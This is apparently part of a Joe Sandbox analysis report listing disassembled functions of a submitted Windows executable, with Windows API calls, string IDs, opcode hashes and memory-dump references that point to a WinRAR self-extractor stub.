                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                    • String ID: Fjun7$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                    • API String ID: 1777411235-1321622670
                                                                                                                                    • Opcode ID: d7702563aae3b3fe26c5c2fc6d3e8010393027edace6e452e13d61316b1fac38
                                                                                                                                    • Instruction ID: 61e0917fc0647e54ce2e01b2185d925ee6898d4556ce7db39360d78848ec572c
                                                                                                                                    • Opcode Fuzzy Hash: d7702563aae3b3fe26c5c2fc6d3e8010393027edace6e452e13d61316b1fac38
                                                                                                                                    • Instruction Fuzzy Hash: DA3125321083117AEB37BB649C46FAB779CDF43720F15421FF5059A1D2EB68DA0583A6
                                                                                                                                    APIs
                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 0037D6C1
                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 0037D6ED
                                                                                                                                      • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0037D709
                                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0037D720
                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0037D734
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0037D75D
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0037D764
                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 0037D76D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                    • String ID: STATIC
                                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                                    • Opcode ID: 0d2d8b4652f1c25b25fc693dc3a59d90b1d9e588a27f5b7616b7daad19fe6a79
                                                                                                                                    • Instruction ID: 9b32b17b59045dff4f65d8cb4263aed1c71b8913f68cc86d47ba9e4f5b2297f6
                                                                                                                                    • Opcode Fuzzy Hash: 0d2d8b4652f1c25b25fc693dc3a59d90b1d9e588a27f5b7616b7daad19fe6a79
                                                                                                                                    • Instruction Fuzzy Hash: C41121731007607FE6337B709C4AFAF766CAF44751F01C120FA4AEA091DA689A0556A6
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                                    • Opcode ID: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
                                                                                                                                    • Instruction ID: 0145e014c49bcc446669f86444e7c1c239d8a1eb58b13eced782fff9d9279981
                                                                                                                                    • Opcode Fuzzy Hash: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
                                                                                                                                    • Instruction Fuzzy Hash: D6B15575800309EFCF2AFFA4C8859AFBBB5BF14B10B15419AE8056B312D735DA51CB91
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n7
                                                                                                                                    • API String ID: 3519838083-1258877181
                                                                                                                                    • Opcode ID: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
                                                                                                                                    • Instruction ID: b801edb2f40fc564b1e0a9c92ee9ad070567d51cea78767f89f65ef547e86f72
                                                                                                                                    • Opcode Fuzzy Hash: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
                                                                                                                                    • Instruction Fuzzy Hash: 50715B71A00619AFDF16DFA8CC959AFBBB9FF48310B044559E512E72A0CB31AD41CF60
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00366FAA
                                                                                                                                    • _wcslen.LIBCMT ref: 00367013
                                                                                                                                    • _wcslen.LIBCMT ref: 00367084
                                                                                                                                      • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                                                                      • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                                                                      • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                    • API String ID: 3122303884-3508440684
                                                                                                                                    • Opcode ID: 09b7e828c9bb1f4fdea96a29f333cd80a7f0e9c6662353a09f8160b0d78f85ae
                                                                                                                                    • Instruction ID: 6b6bda3a5ad7a7ec329c240031c42dba128a26fa8d24cfeb2e1696c6da344ad9
                                                                                                                                    • Opcode Fuzzy Hash: 09b7e828c9bb1f4fdea96a29f333cd80a7f0e9c6662353a09f8160b0d78f85ae
                                                                                                                                    • Instruction Fuzzy Hash: C1413BB1D087447AEF33E7709C42FEEB36C9F05348F408455FA55AA286D674AA448B31
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                      • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037B610
                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0037B637
                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0037B650
                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0037B661
                                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0037B66A
                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0037B67E
                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0037B694
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                                    • String ID: LICENSEDLG
                                                                                                                                    • API String ID: 3214253823-2177901306
                                                                                                                                    • Opcode ID: 178e58efa4463fb0a37d1628411471cb3a44ba14e6a3a53506e24f9ba079f23d
                                                                                                                                    • Instruction ID: 808de1ce296c5d0a778fa1705c40915954bf6d828be70c9ecc176d2c6369fe30
                                                                                                                                    • Opcode Fuzzy Hash: 178e58efa4463fb0a37d1628411471cb3a44ba14e6a3a53506e24f9ba079f23d
                                                                                                                                    • Instruction Fuzzy Hash: 3021D632204218BFD6236B65EC49F7B7B7CEB4AB85F02C014F709E65A0CB56A9019735
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,BD087715,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FD99
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE14
                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0037FE1F
                                                                                                                                    • _com_issue_error.COMSUPP ref: 0037FE48
                                                                                                                                    • _com_issue_error.COMSUPP ref: 0037FE52
                                                                                                                                    • GetLastError.KERNEL32(80070057,BD087715,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE57
                                                                                                                                    • _com_issue_error.COMSUPP ref: 0037FE6A
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE80
                                                                                                                                    • _com_issue_error.COMSUPP ref: 0037FE93
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1353541977-0
                                                                                                                                    • Opcode ID: ee08f03a51424f321b5f04387fab2daf733b9a1baedceb91c00941f158933a06
                                                                                                                                    • Instruction ID: 5a4201071040786365f47383206bfa696e5d0a46e1926bd269423af698b77b93
                                                                                                                                    • Opcode Fuzzy Hash: ee08f03a51424f321b5f04387fab2daf733b9a1baedceb91c00941f158933a06
                                                                                                                                    • Instruction Fuzzy Hash: 6641CCB1A00215EFDB229F64CC45BAFB7A8FF44710F10827AF919E7651D7399900C7A5
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00369387
                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003693AA
                                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003693C9
                                                                                                                                      • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                                                                      • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                                                                    • _swprintf.LIBCMT ref: 00369465
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003694D4
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00369514
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                    • String ID: rtmp%d
                                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                                    • Opcode ID: 683246bfa98e8fba2d57cd0fbdbde78042f78a11d61d984085c639077656674b
                                                                                                                                    • Instruction ID: 00108c9c8ec5415db0e32dbbd43f73687448d6260f0222137f414dc3a19af6da
                                                                                                                                    • Opcode Fuzzy Hash: 683246bfa98e8fba2d57cd0fbdbde78042f78a11d61d984085c639077656674b
                                                                                                                                    • Instruction Fuzzy Hash: 504177B1900258A5DF23EB61CD55FEE737CAF45740F00C8A6B64AE7155DB388B898B60
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: U7$p7$z7
                                                                                                                                    • API String ID: 176396367-3179075045
                                                                                                                                    • Opcode ID: 254e4c30cb83f6dc38ac31aa9301da3b2f1e24438fca564fbc97258da82e9109
                                                                                                                                    • Instruction ID: 23e00f1cb78c102a2918df415b6aaa91b44ddf80a76c7ed3cba2d1b8ced83ebe
                                                                                                                                    • Opcode Fuzzy Hash: 254e4c30cb83f6dc38ac31aa9301da3b2f1e24438fca564fbc97258da82e9109
                                                                                                                                    • Instruction Fuzzy Hash: 4841B6719006699BCB26AF68CC159DFBBBCEF01311F058019F946F7245DB34AE458BA0
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00379EEE
                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 00379F44
                                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00379FDB
                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00379FE3
                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00379FF9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                                    • String ID: 7$RarHtmlClassName
                                                                                                                                    • API String ID: 3937224194-370341044
                                                                                                                                    • Opcode ID: 3140e294efc35f005f4491365d00a2d4f88b13942a758055424caedede7d2930
                                                                                                                                    • Instruction ID: f69b7a7f50432805bf5da223437626acb393e0495c5109055a2302a1ca8d6d8d
                                                                                                                                    • Opcode Fuzzy Hash: 3140e294efc35f005f4491365d00a2d4f88b13942a758055424caedede7d2930
                                                                                                                                    • Instruction Fuzzy Hash: B841AF32008314EFCB23AF649C48F6B7BACEF48702F05C659F8499A156DB38E904DB61
                                                                                                                                    APIs
                                                                                                                                    • __aulldiv.LIBCMT ref: 0037122E
                                                                                                                                      • Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00371251
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00371263
                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00371274
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371284
                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371294
                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003712CF
                                                                                                                                    • __aullrem.LIBCMT ref: 00371379
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1247370737-0
                                                                                                                                    • Opcode ID: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
                                                                                                                                    • Instruction ID: a324559b808e068a019df5012837949852d5623d57ca928de80683eda7dd0bc3
                                                                                                                                    • Opcode Fuzzy Hash: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
                                                                                                                                    • Instruction Fuzzy Hash: 9B4118B6508305AFD711DF69C88496BBBF9FF88314F00892EF59AC6210E739E649CB51
                                                                                                                                    APIs
                                                                                                                                    • _swprintf.LIBCMT ref: 00362536
                                                                                                                                      • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                                                                      • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                                    • API String ID: 3053425827-2277559157
                                                                                                                                    • Opcode ID: 8d563ee1c3ea45da8f95b4405fb96fbce0d0a9910441c761d781c708ca310319
                                                                                                                                    • Instruction ID: 49d3e63ba858cedbed4ae221c08d13dc5ac126d87125323100fd59693346f4ba
                                                                                                                                    • Opcode Fuzzy Hash: 8d563ee1c3ea45da8f95b4405fb96fbce0d0a9910441c761d781c708ca310319
                                                                                                                                    • Instruction Fuzzy Hash: 19F125716047409BCB27DB288895BFB77995F90300F0AC569EDCA9F28BCB648945C762
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                                                                                                    • API String ID: 176396367-3568243669
                                                                                                                                    • Opcode ID: db6ae0074ed855282495a25ef839ffde6b161c55a8c505cb1725ed8a6d5c8498
